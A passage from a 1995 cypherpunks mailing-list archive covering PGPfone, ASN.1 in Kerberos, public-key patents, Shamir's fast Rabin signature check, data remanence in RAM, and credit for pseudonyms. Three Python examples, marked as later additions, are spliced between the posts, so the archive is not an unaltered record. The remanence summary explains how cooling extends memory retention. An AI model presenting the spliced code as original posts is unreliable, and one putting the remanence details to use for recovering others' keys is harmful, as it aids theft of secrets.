instead it put up a dialog box allowing me to click on the machine
running the other PGPfone.  I did that and it connected OK.  There is a
nice audio simulation of an old-fashioned telephone bell ringing.

Unfortunately my appletalk "network" consists solely of my power mac
and an old 68030 mac laptop, the latter apparently being underpowered for
PGPfone.  The voice quality changed occasionally as the software
adaptively tried different coders, and the powermac instance of the
program finally printed a message saying that the list of coders had
been exhausted.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jis@mit.edu (Jis@mit.edu)
Date: Wed, 20 Sep 95 17:16:36 PDT
To: cypherpunks@toad.com
Subject: ASN.1 AND KERBEROS VERSION 5
Message-ID: <9509201547165561@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Sat, 2 Sep 1995 13:55:38 -0400
To: cypherpunks@toad.com
From: jis@mit.edu (Jeffrey I. Schiller)
Subject: ASN.1 and Kerberos version 5

-----BEGIN PGP SIGNED MESSAGE-----

Perry E. Metzger writes:
>I've heard people associated with the decision to use ASN.1 in
>Kerberos V say it was a mistake. Frankly, I think ASN.1 is a blight
>which should be exterminated from the planet.

I'll say it. I was the person who pushed for the use of ASN.1 in Kerberos
version 5. I had this disease at the time that made me think that ASN.1 was
a good idea. I got better, unfortunately we have been living with the
results of my braino for quite some time now... poor Ted.

However, the problem with ASN.1 isn't its waste of space (which actually
isn't that bad for a mechanism for encoding arbitrary objects). The problem
is that it is the product of a standards making process that didn't (and
doesn't) value interoperability. Adherence to the ISO specifications does
not guarantee interoperation. Instead regional "workshops" negotiate
aspects of implementations to obtain interoperation.

What does this mean for ASN.1? It means that the definition of ASN.1 is a
bit abstract (as its name implies). Problems result when two organizations
(say MIT and OSF!) attempt to implement from the specification in ASN.1 but
use different ASN.1 compilers and things then don't work. Arguments then
ensue about whose compiler (or manually written parsing code) is "correct"
in terms of doing the right thing with ASN.1. This is particularly so when
using DER (for Distinguished Encoding Rules) which is itself an
after-thought added to ASN.1 later in the process. It is required in order
to verify digital signatures (which have to be computed on the "encoded"
form of an object because there is no good way to calculate a signature on
an "abstract" object).

If the Kerberos specification said: "put this byte here and that one there"
none of these arguments and problems would happen.

                                -Jeff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEiaf8UtR20Nv5BtAQFzNAP/Q/LuIMbxAPAp64Kn2PSPd600TYlRAUJh
QbsuL/iRhGXWrxSjsFzkcr6e3sIpSFggxglFU38TJT/DG2AD8MOid3Uj4pRJVbyo
z7Au0Vp1NiotmRBHq2udItzJ7LLPM0j38FHQenqPs9mkX2Cq5kVgGUBO94HabEuE
S9XPCgV8E1Q=
=kTyw
-----END PGP SIGNATURE-----
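
The point in the message above about signatures being computed over the encoded form, as an added example that is not part of the original post: one abstract INTEGER has several valid BER encodings but only one DER encoding, so digests taken over the bytes differ unless both sides canonicalize. The function names and the three sample encodings are constructed for illustration.

```python
import hashlib


class EncodingError(ValueError):
    """Raised when a TLV is malformed or violates the requested rules."""


def parse_integer(data, strict_der):
    """Decode one ASN.1 INTEGER TLV.

    strict_der=False accepts any definite-length BER form;
    strict_der=True additionally enforces DER's minimal length encoding.
    """
    if len(data) < 2 or data[0] != 0x02:
        raise EncodingError("not an INTEGER")
    first = data[1]
    if first < 0x80:                       # short form: length in one byte
        length, offset = first, 2
    elif first in (0x80, 0xFF):            # indefinite / reserved
        raise EncodingError("length form not valid for a primitive type")
    else:                                  # long form: count of length bytes
        count = first & 0x7F
        if len(data) < 2 + count:
            raise EncodingError("truncated length")
        length = int.from_bytes(data[2:2 + count], "big")
        offset = 2 + count
        # DER: short form below 128, and no leading zero length bytes.
        if strict_der and (length < 0x80 or data[2] == 0):
            raise EncodingError("DER: length not in minimal form")
    body = data[offset:]
    if length == 0 or len(body) != length:
        raise EncodingError("bad content length")
    # Redundant leading content bytes are invalid in BER and DER alike.
    if length > 1 and ((body[0] == 0x00 and body[1] < 0x80) or
                       (body[0] == 0xFF and body[1] >= 0x80)):
        raise EncodingError("integer contents not minimal")
    return int.from_bytes(body, "big", signed=True)


# Constructed sample encodings of the same abstract value, INTEGER 5.
DER_FORM = bytes.fromhex("020105")        # short-form length (the DER form)
BER_LONG = bytes.fromhex("02810105")      # long-form length, one length byte
BER_PADDED = bytes.fromhex("0282000105")  # long-form length with a zero pad


def survey(encodings):
    """Per encoding: (value under BER, accepted as DER?, digest of the bytes)."""
    rows = []
    for enc in encodings:
        value = parse_integer(enc, strict_der=False)
        try:
            parse_integer(enc, strict_der=True)
            is_der = True
        except EncodingError:
            is_der = False
        rows.append((value, is_der, hashlib.sha256(enc).hexdigest()))
    return rows


if __name__ == "__main__":
    for value, is_der, digest in survey([DER_FORM, BER_LONG, BER_PADDED]):
        print(value, "DER" if is_der else "BER only", digest[:16])
```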






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <adept@minerva.cis.yale.edu>
Date: Sat, 2 Sep 95 18:32:55 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Basic Public key algorithms.
In-Reply-To: <199509021813.OAA29335@frankenstein.piermont.com>
Message-ID: <Pine.SOL.3.91.950902200055.7559K-100000@minerva>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 2 Sep 1995, Perry E. Metzger wrote:

> 
> Daniel R. Oelke writes:
> > I could use RSA (which is well described in many sources, and has
> > RSAREF out there),  but I want to avoid the patent issue if possible.  
> > The sci.crypt FAQ mentions that there are other methods but that 
> > is about all it says.  Are there any that are not patented?
> 
> No, because one patent covers public key cryptography itself, and not
> a particular method.

Point of information--I'm not flaming you Perry, but Public Key Partners 
claims that their patent covers all forms of Public Key Crypto.

Phoeeey.

Ben.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQB1AwUBMEjwWb5ALmeTVXAJAQGW2wL/RAfqyRrNoUeYDBkQKSsDhasM/xGSF3R/
JHvJyaFHr04Z+8KydRXxt+fU54JH01webbiol1EmH9ZvOdc175VRVBSg5+EiykzM
1bdW6dZXejeHHVelI343mOv0+Y0fDeiT
=FPqc
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 2 Sep 95 18:14:53 PDT
To: cypherpunks@toad.com
Subject: Quickly checking signatures
Message-ID: <199509030113.SAA19877@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Let me describe Shamir's method for quickly doing a probabilistic signature
check.  Since this was a rump session paper he didn't have it written up.

Shamir uses a variation of the Rabin system.  The Rabin encryption
system is similar to RSA, but instead of exponents which are relatively
prime to the predecessors of the factors of the modulus, the exponent
used is 2.  This requires somewhat different techniques.

A message M is encrypted by doing M^2 mod n.  The decryption is then
done by taking the modular square root.  There are a few technical
hitches that occur here but nothing major.  Similarly a message M is
signed by calculating its modular square root S such that S^2 = M mod n.
Note that with Rabin you can't just sign any arbitrary number as that
may allow the factors to be revealed.  However this is not a major problem
because practical systems in use today sign specially padded hashes,
not arbitrary numbers.

Now Shamir uses a slight modification to this.  Normally we have:

	S^2 = M mod n

This can be written as:

	S^2 = M + C*n

for some C, which is simply the definition of modular equality.  Now,
what he suggests is that instead of sending S as the signature of M, you
send C.  This is justified on 3 grounds:

	- C is the same size as S
	- C has the same security as S (knowing M and n you can derive C
	  from S and vice versa)
	- C and S are equally easy to generate

However, by sending C as the signature of a message M it allows a fast
screening to be done.  The idea is that the message should be accepted if
M+C*n is a perfect square (because then S can be derived as the normal
square root - that is how you get S from C as mentioned above).  And this
is something that can be checked quickly.

In number theory there is a notion of a "quadratic residue" modulo some
number.  If a number is a quadratic residue that simply means that it has
a square root, that it is the square of some other number using the
modulus.  With a prime modulus half of the numbers are quadratic residues
and half are not.  For example, with modulus 7 the q.r.'s are 1, 2 and 4
and the non q.r.'s are 3, 5, and 6.  It turns out that testing whether a
number x is a quadratic residue modulo a prime p can be done by
calculating x^((p-1)/2) mod p.  This will be 1 if and only if x is a q.r.

Now, the key idea is this: if a number is a perfect square then the
result of taking that number modulo a prime must be a quadratic residue.
This means that we can quickly determine that C is a perfect square by
checking whether C mod p for various random small primes p is a quadratic
residue.

By picking p to be a single precision prime of say 16 bits, the q.r.
calculation can all be done without using multiple precision arithmetic
and so it will be very fast compared to actually checking a signature.

So, the procedure for the check is as follows: given n, M and C, choose a
small prime p and calculate M+C*n mod p.  Then raise this to the (p-1)/2
power mod p and see if the answer is 1.  If it is, we give a
"provisional" acceptance to the signature.  If it is not, we reject the
signature; it cannot be valid.  This test may be repeated a few times
with different values of p to improve the rejection of bad signatures.
Once we have taken the input numbers mod p the rest of the arithmetic can
be done with ordinary single precision integer variables.

(One thing I overlooked is the possibility that M+C*n will be a multiple
of p.  In that case M+C*n mod p will be 0 and this is a provisional pass.)

Of course checking the signature the old-fashioned way just takes a
single multi precision multiplication, which won't be all that slow.
So this puts a limit on the number of p's you can check this fast
way before it becomes slower.  Also, you'd have to choose the primes at
random as otherwise an attacker who knew your p's could conjure up a C
which would produce a quadratic residue for some small number of known
p's.

Hal
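
The screening procedure described in the message above, as an added example that is not part of the original post or of Shamir's talk: a signer produces C, and the server rejects forgeries using only arithmetic modulo random 16-bit primes before any full check. Assumptions made here: a constructed toy key built from two Mersenne primes, SHA-256 with a one-byte counter standing in for the padded hash, and hypothetical function names.

```python
import hashlib
import math
import random

# Constructed toy key: two Mersenne primes, both 3 mod 4. Special-form primes
# like these are for demonstration only and would make a weak real key.
P = 2**107 - 1
Q = 2**127 - 1
N = P * Q


def small_primes(lo=1 << 15, hi=1 << 16):
    """All primes in [lo, hi): the 16-bit 'single precision' primes."""
    sieve = bytearray([1]) * hi
    sieve[0:2] = b"\x00\x00"
    for i in range(2, math.isqrt(hi) + 1):
        if sieve[i]:
            sieve[i * i::i] = bytearray(len(range(i * i, hi, i)))
    return [i for i in range(lo, hi) if sieve[i]]


def digest(message, counter, n=N):
    """Hash-to-integer M (assumption: SHA-256 over a counter byte + message)."""
    h = hashlib.sha256(bytes([counter]) + message).digest()
    return int.from_bytes(h, "big") % n


def is_qr(x, p):
    """Euler's criterion: x is a nonzero square modulo the odd prime p."""
    return pow(x, (p - 1) // 2, p) == 1


def sign(message, p=P, q=Q):
    """Return (counter, C) such that M + C*n is a perfect square S^2."""
    n = p * q
    for counter in range(256):             # retry until M is a square mod n
        M = digest(message, counter, n)
        if is_qr(M % p, p) and is_qr(M % q, q):
            break
    else:
        raise ValueError("no quadratic residue found")
    rp = pow(M, (p + 1) // 4, p)            # square roots, valid for p = 3 mod 4
    rq = pow(M, (q + 1) // 4, q)
    S = (rp * q * pow(q, -1, p) + rq * p * pow(p, -1, q)) % n   # CRT
    assert S * S % n == M
    return counter, (S * S - M) // n


def screen(M, C, primes, n=N):
    """Fast check: False means certainly invalid, True is only provisional."""
    for p in primes:
        r = (M % p + (C % p) * (n % p)) % p   # single precision from here on
        if r and not is_qr(r, p):             # r == 0 counts as a pass
            return False
    return True


def full_verify(M, C, n=N):
    """Exact check: M + C*n must be a perfect square over the integers."""
    v = M + C * n
    return C >= 0 and math.isqrt(v) ** 2 == v


def false_accept_rate(message, k, trials, rng):
    """Fraction of random forged C values that survive k screening primes."""
    primes = small_primes()
    M = digest(message, 0)
    passed = 0
    for _ in range(trials):
        forged_c = rng.randrange(N)
        # The primes must be unpredictable to the sender; a real server
        # would draw them from secrets.SystemRandom(), not a seeded generator.
        if screen(M, forged_c, rng.sample(primes, k)):
            passed += 1
    return passed / trials


if __name__ == "__main__":
    msg = b"constructed sample message"
    counter, C = sign(msg)
    M = digest(msg, counter)
    rng = random.Random(1995)               # seeded only to make the demo repeatable
    print("valid passes screen:", screen(M, C, rng.sample(small_primes(), 4)))
    print("valid passes full check:", full_verify(M, C))
    for k in (1, 2, 4, 8):
        print(k, "primes -> forged accepted:", false_accept_rate(msg, k, 4000, rng))
```

Each extra prime roughly halves the share of random forgeries that reach the full check, while a genuine signature passes for every prime.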




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut01@cs.auckland.ac.nz (Peter Gutmann)
Date: 2 Sep 1995 18:26:03 GMT
Subject: SUMMARY: Not-so-volatile volatile memory
Message-ID: <42a7jr$1me@net.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain





About a month ago, I asked for comments about recovering data from
semiconductor memory after power had been removed.  After much procrastinating,
I've finally finished the summary of what people sent me.  Many thanks to
everyone who responded, in particular to Bob Hale for answering many questions
about the possibility of recovering data from DRAM's.
 
If anyone has any further comments to add to this (I'm particularly interested
in actual figures for data retention in DRAM cells, although I've been told
this is burn-before-reading proprietary information), you can send it to me at
the above address.
 
Peter.

-- Summary: Data retention in semiconductor memory --
 
Contrary to conventional wisdom, "volatile" semiconductor memory does not
entirely lose its contents when power is removed.  Both static (SRAM) and
dynamic (DRAM) memory retain some information on the data stored in it while
power was still applied.  SRAM is particularly susceptible to this problem, as
storing the same data in it over a long period of time has the effect of
altering the preferred power-up state to the state which was stored when power
was removed.  Older SRAM chips could often "remember" the previously held state
for several days.  In fact, it is possible to manufacture SRAM's which always
have a certain state on power-up, but which can be overwritten later on - a
kind of "writeable ROM".
 
DRAM can also "remember" the last stored state, but in a slightly different
way.  It isn't so much that the charge (in the sense of a voltage appearing
across a capacitance) is retained by the RAM cells, but that the thin oxide
which forms the storage capacitor dielectric is highly stressed by the applied
field, or is not stressed by the field, so that the properties of the oxide
change slightly depending on the state of the data.  One thing that can cause a
threshold shift in the RAM cells is ionic contamination of the cell(s) of
interest, although such contamination is rarer now than it used to be, because
robotic handling of the materials and the purity of chemicals is greatly
improved.  However, even a perfect oxide is subject to having its properties
changed by an applied field.  When it comes to contaminants, sodium is the most
common offender - it is found virtually everywhere, and is a fairly small (and
therefore mobile) atom with a positive charge.  In the presence of an electric
field, it migrates towards the negative pole with a velocity which depends on
temperature, concentration of the sodium, the oxide quality, and the other
impurities in the oxide such as dopants from the processing.  If the electric
field is zero then, given enough time, the sodium contamination tends to spread
itself around evenly.
 
Other factors which affect the rate of change are temperature, the field
strength of the stored charge, the quality of the oxide, and the concentration
of dopants and other impurities which have already been mentioned above.  The
stress on the cell is a cumulative effect, much like charging an RC circuit.  If
the data is applied for only a few milliseconds then there is very little
"learning" of the cell, but if it is applied for hours then the cell will
acquire a strong (relatively speaking) change in its threshold.
 
The effects of the stress on the RAM cells can be measured using the built-in
self test capabilities of the cells, which provide the ability to impress a
weak voltage on the storage cell in order to measure its margin.  Cells will
show different margins depending on how much oxide stress has been present.
Many DRAM's have undocumented test modes which allow some normal I/O pin to
become the power supply for the RAM core when the special mode is active.
 
One way to activate the special test mode might be to underdrive a pin and turn
on its protection diode(s), which will be recognized internally and will
change a multiplexer so that the core is powered by some pin which is normally
a digital I/O pin.  Another way, if the DRAM has suitable clocks, is to
recognise an invalid combination of clocks (such as CAS before RAS, if the DRAM
doesn't use that mode for higher speed operation) to enable the test mode.
Great care must be taken to ensure that the test mode isn't inadvertently
entered so that the memory system appears to be malfunctioning (for example in
the first case if the system has substantial undershoot at the wrong time, the
test mode could be activated).  This problem can be avoided by designing the
test mode signals such that a certain set of states which would not occur in a
normally-functioning system has to be traversed to activate the mode.
Manufacturers won't admit to such capabilities in their products because they
don't want their customers using them and potentially rejecting devices which
comply with their spec sheets, but have little margin beyond that.
 
One way to speed up the annihilation of stored bits in semiconductor memory is
to heat it.  Both DRAM's and SRAM's will lose their contents a lot more quickly
at Tjunction = 140C than they will at room temperature.  Several hours at that
temperature with no power applied will clear their contents sufficiently to
make recovery difficult.  Conversely, to extend the life of stored bits with
the power removed, drop the temperature below -60C (some people even claim that
you can permanently "imprint" an SRAM with its stored bits by rapidly cooling
it below liquid nitrogen's boiling point).  In any case it should lead to
weeks, instead of hours or days, of data "retention".
 
Simply repeatedly overwriting the data held in DRAM with new data isn't nearly
as effective as it is for magnetic media.  The new data will begin stressing or
relaxing the oxide as soon as it is written, and the oxide will immediately
begin to take a "set" which will either reinforce the previous "set" or will
weaken it.  The greater the amount of time that new data has existed in the
cell, the more the old stress is "diluted", and the less reliable the
information extraction will be.  Generally, the rates of change due to stress
and relaxation are in the same order of magnitude.  Thus, a few microseconds of
storing the opposite data to the currently stored value will have little effect
on the oxide.  Ideally, the oxide should be exposed to as much stress at the
highest feasible temperature and for as long as possible to get the greatest
"erasure" of the data.  Unfortunately if carried too far this has a rather
detrimental effect on the life expectancy of the RAM.
 
Therefore the goal to aim for when sanitising memory is to store the data for
as long as possible rather than trying to change it as often as possible.
Conversely, storing the data for as short a time as possible will reduce the
chances of it being "remembered" by the cell.  Based on tests on DRAM cells, a
storage time of one second causes such a small change in threshold that it
probably isn't detectable.  On the other hand, one minute probably is
detectable, and 10 minutes is certainly detectable.
 
The most practical solution to the problem of DRAM data retention is therefore
to constantly flip the bits in memory to ensure that a memory cell never holds
a charge long enough for it to be "remembered".  While not practical for
general use, it is possible to do this for small amounts of data such as
encryption keys.  
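
The bit-flipping mitigation from the last paragraph above, as an added example that is not part of the original summary: a key holder that inverts its buffer in place on a timer, so each cell spends equal time at 0 and 1 and never holds one value for long. The class name and the 0.5 second interval are assumptions; Python is used only to show the logic, and the interpreter may make copies that this code does not control.

```python
import threading


class FlippingKey:
    """Hold a short secret so that no memory cell keeps one value for long."""

    def __init__(self, key, interval=0.5):
        self._buf = bytearray(key)      # the only long-lived copy of the key
        self._inverted = False          # True while _buf holds the complement
        self._lock = threading.Lock()
        self._interval = interval       # kept under the one-second figure above
        self._stop = threading.Event()
        self.flips = 0
        self._thread = threading.Thread(target=self._run, daemon=True)

    def start(self):
        """Begin flipping in the background."""
        self._thread.start()

    def _run(self):
        # Event.wait returns False on timeout, True once close() sets it.
        while not self._stop.wait(self._interval):
            self.flip()

    def flip(self):
        """Invert every bit of the stored buffer in place."""
        with self._lock:
            for i in range(len(self._buf)):
                self._buf[i] ^= 0xFF
            self._inverted = not self._inverted
            self.flips += 1

    def use(self, fn):
        """Call fn on a short-lived plaintext copy, then overwrite the copy."""
        with self._lock:
            mask = 0xFF if self._inverted else 0x00
            tmp = bytearray(b ^ mask for b in self._buf)
        try:
            return fn(tmp)
        finally:
            for i in range(len(tmp)):
                tmp[i] = 0

    def close(self):
        """Stop flipping and overwrite the stored buffer."""
        self._stop.set()
        if self._thread.is_alive():
            self._thread.join()
        with self._lock:
            for i in range(len(self._buf)):
                self._buf[i] = 0


if __name__ == "__main__":
    import time
    holder = FlippingKey(b"constructed demo key", interval=0.05)
    holder.start()
    time.sleep(0.3)
    print("flips so far:", holder.flips)
    print("key still recoverable:", holder.use(bytes) == b"constructed demo key")
    holder.close()
```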





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 3 Sep 95 02:23:04 PDT
To: Ben <adept@minerva.cis.yale.edu>
Subject: Re: Basic Public key algorithms.
In-Reply-To: <Pine.SOL.3.91.950902200055.7559K-100000@minerva>
Message-ID: <199509030031.UAA29612@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Ben writes:
> > Daniel R. Oelke writes:
> > > I could use RSA (which is well described in many sources, and has
> > > RSAREF out there),  but I want to avoid the patent issue if possible.  
> > > The sci.crypt FAQ mentions that there are other methods but that 
> > > is about all it says.  Are there any that are not patented?
> > 
> > No, because one patent covers public key cryptography itself, and not
> > a particular method.
> 
> Point of information--I'm not flaming you Perry, but Public Key Partners 
> claims that their patent covers all forms of Public Key Crypto.

How is this at all different from what I just said?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: terrell@sam.neosoft.com (Buford Terrell)
Date: Sat, 2 Sep 95 15:51:31 PDT
To: cypherpunks@toad.com
Subject: Re: MIT distributing PGPfone -Reply
Message-ID: <199509022301.SAA00324@sam.neosoft.com>
MIME-Version: 1.0
Content-Type: text/plain



>PGPfone was out of the U.S. less than 3 hours after first appearing
>publicly at the MIT site.
>
>As I noted in a previous message, MIT takes various steps to ostensibly
>protect against export, but there is clearly no practical means of stopping
>export once the software has been received by someone.
>
>I got my copy of PGPfone 16 hours after its public release, via an
>anonymous person who posted it on the Cypherpunks list through an anonymous
>remailer. Of course that list is distributed to more than 20 foreign
>countries, so "export" happened that way, as well as by other means.
>
>--Tim May
>

As Tim May's .sig should say: "National borders are not even
speed bumps on the information highway."

Buford C. Terrell                       1303 San Jacinto Street
Professor of Law                              Houston, TX 77002
South Texas College of Law                voice   (713)646-1857
terrell@sam.neosoft.com                     fax   (713)646-1766





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Murray <davidm@iconz.co.nz>
Date: Fri, 1 Sep 95 23:40:55 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: A problem with anonymity
Message-ID: <199509020640.SAA23731@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 05:15 PM 9/1/95 -0700, you wrote:
>At 10:45 AM 9/2/95, David Murray wrote:
>>[Akerlof, if I remember my economics right (and I am confident that I will
>>be corrected if I don't) analysed a market for used cars.
...
>>... So the only cars for sale would be lemons :-)]
>
>I haven't encountered this example, but it clearly misses some important
>real-world issues.
...
>Like a lot of simple game-theoretic models, the application to the real
>world is quite different.

True. But it does make the point that, in a perhaps surprising way, the
bad can drive out the good. [I certainly don't want to get into any kind
of normative v. positive methodological debate.] The lesson is not that
"You can never find a decent used car", but that, in a market with particular
characteristics (particularly with regard to what information is available
to whom), lemons drive out the good. This just means that owners of good
used cars offer them for sale in a market where pre-purchase checks are
possible, etc..

But this is to concentrate on the example, not on the substance...

>But I certainly agree that crypto will reignite interest in analyses of
>such game theory questions. Another way of viewing anonymity vs.
>non-anonymity is that knowing the True Name of a party with whom one trades
>is just _one element_ of a transaction. By no means is it essential.

I guess I was using True Name somewhat unusually. I didn't mean "True Name=
state approved unique identifier of a human being" so much as "True Name<>
easily discardable/transferrable/sellable digital pseudonym". 

I certainly did not mean to imply that net.commerce is impossible, or that
it would only take place on the basis of True Names, however defined. Rather
I was commenting that one pervasive feature of non-net.commerce is the
ability to track down someone that owes you something and sue them/beat it
out of them. You can't do this to a digital pseudonym. As you rightly
pointed out, you can't do this to someone who escapes to South America,
or to the guy who runs the market stall that won't be there tomorrow. So 
you take a bond, or you take your chances. I still think that, because of
the (perfect) ease with which net.rep's are transferrable/cash-in-able,
the chances you take in the digital domain are so much higher as to be
(almost?) qualitatively different.

>>If you can't rely on the unsecured promise of a digital pseudonym, and you
>>can't accept reputation as 'security', how do you extend credit?
>
>I am willing to extend some amount of credit to PrOduct Cypher, Black
>Unicorn, etc., based on their past reputation and on the fact that I can
>show to others the transactions into which their pseudonyms entered and
>thus expose them if they default. Now _how much_ I'm willing to extend is
>of course a more complicated issue, but the principle is still there: a
>purely digital pseudonym, with no possibility of being tied to a True Name,
>can still be extended credit....I just said I would do so.

This would, of course, allow PrOduct Cypher (for example) to cash in on hir
rep. [Hir - never thought I'd see myself use it: ughhhhhhh <shiver>]. But,
unlike the unscrupulous stall owner, who would have to sell the gold watch
before he decamped, PC could sell hir rep before the rip-off had been done.
This would be a sort of division of labour - rep-builders and rep-exploiters.
In cyberspace, you could never tell whether you were dealing with the rep
builder (buying a good car) or a rep exploiter (buying a lemon).

Yes the rep-exploitation would be a one-shot thing. Within seconds of the
sting PC's name would be mud. [And, yes, you could probably tell whether
it was one of those two you were dealing with - if it asked for credit, it
wouldn't be 'corn or 'pher :-)]

But it is the _possibility_ of the scam that would shape the market.

By the way, my final question was not rhetorical. I _do_ think methods of
extending credit to pseudonyms will be developed. I just think they will
be based on (possibly new) types of security interest. An old type of 
security interest (perhaps the oldest) could be used right away - the pledge.
If Bob Pseudonymous pledges $100 worth of digital certificates, I would be
glad to lend him $100 (well, perhaps $80 - gotta secure the interest:-)

Cryptography might develop other ways of protecting the interests of
creditors, while preserving the anonymity of debtors. In fact, I'm certain
it will. And I'm just as sure the law/mercantile practice will assist in
the process.

And like you, I believe it is not only possible, but preferable, that this
is done without the intervention/'assistance' of the state.

Cheers,

Dm


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEftjllo3j8JHzalAQE1OwP+IQTX2hUfJXI8Q7ojgFcKbnvxRLngSyDp
rLm0wjZvMoiLwCqwhqn6F3ypTJBD0pS1ZT7ql+rnnEsYtQ75Xu0iJFbnnIY4whNh
gB1plcImYms88Rt7VEuCjHZeAMHcV3tPZL9DHQVHZXMwqWKCeyBaImVaEosJTwZj
IuZ4HHCi+GE=
=V7vf
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Sat, 2 Sep 95 15:45:05 PDT
To: cypherpunks@toad.com
Subject: VoicePGP Query
Message-ID: <199509022244.SAA24545@csws5.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



Due to some acct. problems I lost most of the mail sent to me betw. May
and September.  I saw a post in a newsgroup about VoicePGP betas being 
available, though only for Mac and Win '95... is this true? And if so,
will there be a Win 3.11 or OS/2 or DOS version out eventually? I don't
intend to get Win '95 for as long as I can avoid it (and this is NOT the
start of an OS flame war...)

Also, what's the status of PGP 3.0?

Thanks,

Rob



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Sat, 2 Sep 95 19:41:49 PDT
To: Dar Scott <dsc@swcp.com>
Subject: Re: Cyphernomicon, and a section on Escrow and Reputations
In-Reply-To: <v01510100ac6dcfd46ccc@[198.59.115.135]>
Message-ID: <Pine.SGI.3.91.950902194010.8460C-100000@Sequoia.picosof.com>
MIME-Version: 1.0
Content-Type: text/plain


On 2 Sep 1995, Dar Scott wrote:

> >I finished my first release, a megabyte-sized file done in MORE, a powerful
> >outline processor (which enabled me to maintain notes, make
> >cross-references, and generally manage such a huge writing project). I
> >released it last year, and put it in my anonymous ftp account at
> >ftp.netcom.com, in the directory /pub/tc/tcmay, as the file CP-FAQ. Netcom
> >is often very crowded, though.
> 
> After several tries I was not able to get this.  Has anyone made it
> available in an alternate location?

Tim mentioned that we're planning on spiffing up the cypherpunks web
site (including using a real web server) and the cyphernomicon is an
obvious candidate for inclusion - depending on how many people help out,
the new site (a quasi-mirror at first, till we get sameer/et al's
go-ahead) should be live within a couple weeks.

If you're interested in gathering documents, hacking HTML, or anything
else involved in creating/maintaining a web hierarchy, drop me a line.
The space/delivery of the documents we're providing for free, but I
don't have a budget to hire a staff to do things the "right way" (my way :)
for this project.

--
   Jay Campbell - Regional Operations Manager
   -=-=-=-=-=-=-  Sense Networking (Santa Cruz Node)   edge@you.got.net 
                  "Shoot the Fruit Loop"               408.469.9400






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 2 Sep 95 20:58:25 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: A problem with anonymity
Message-ID: <ac6e746b10021004dfaf@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:38 AM 9/3/95, MONTY HARDER wrote:

>  But if the escrow agent is anonymous, we simply recurse, moving now to
>the question of whether anyone can trust the Anonymous Escrow Agency not
>to take the money and run.

Well, at one level, everything is always recursive.

But seriously, the reason it differs is that the escrow agents are in the
business to be escrow agents, not to take the money and run. This actually
works in the real world. (Game-theoretically, they get a certain payoff in
defecting, but then forego the revenue stream from future transactions....)

And, of course, it is possible to structure things so that the escrow agent
cannot "take the money and run," because the money is not accessible to
them.

This is analogous to an escrow agent in the real world holding a check from
Alice to Bob until Bob completes some set of conditions. The escrow
agent--call her Essie--cannot cash the check herself. She can of course
renege on the deal, even if Bob does his part of the bargain, but there is
little incentive for her to do so.

One can ask what payoffs and costs/benefits exist for various actions by
these agents, and game theory needs to take a look at these sorts of
transactions, but there are plenty of reasons to believe "convergence" will
occur (basically, that "effectively honest" behavior will be common).

>TC> (I mention banks because, when you look at it closely, today's banks can
>TC> quite easily claim that a customer made a withdrawal when he didn't. That
>TC> they don't says more about the nature of persistent businesses than about
>TC> any government oversight or security features. This is a side point, but it
>TC> bears keeping in mind that the real world of banks and businesses, etc., is
>TC> not fully secure, either. And yet it mostly works pretty well. The reasons
>TC> for this are interesting to consider.)
>
>  A bank has $$ invested in impressive-looking buildings, (so that
>vanishing into the ether and setting up shop elsewhere is rather
>difficult) and several officers whose TrueNames are registered with the
>appropriate agencies, so that they may be sued if they pull this
>crap.

No, my point was that it is fairly easy for any bank to scam any particular
customer, given the flaky nature of verification of withdrawals and other
transactions (at least for smallish amounts of money). Few banks check
signatures, few banks bother to demand much ID, etc.

The issue is not whether you can sue Bank of America, but whether you could win.

That banks don't often scam customers for small amounts of money is
testimony to the fact that they've got a better payoff matrix element in
being a bank than the meager payoff in scamming a few customers.

I submit this not as proof, but as evidence that the type of "convergence"
mentioned above mostly works. Most commerce hinges on this, not because of
law enforcement. Like True Names, the threat of law enforcement is only a
part of the overall equation.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sat, 2 Sep 95 21:35:08 PDT
To: cypherpunks@toad.com
Subject: Crypto '95: Robert Morris
Message-ID: <199509030434.VAA24841@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain


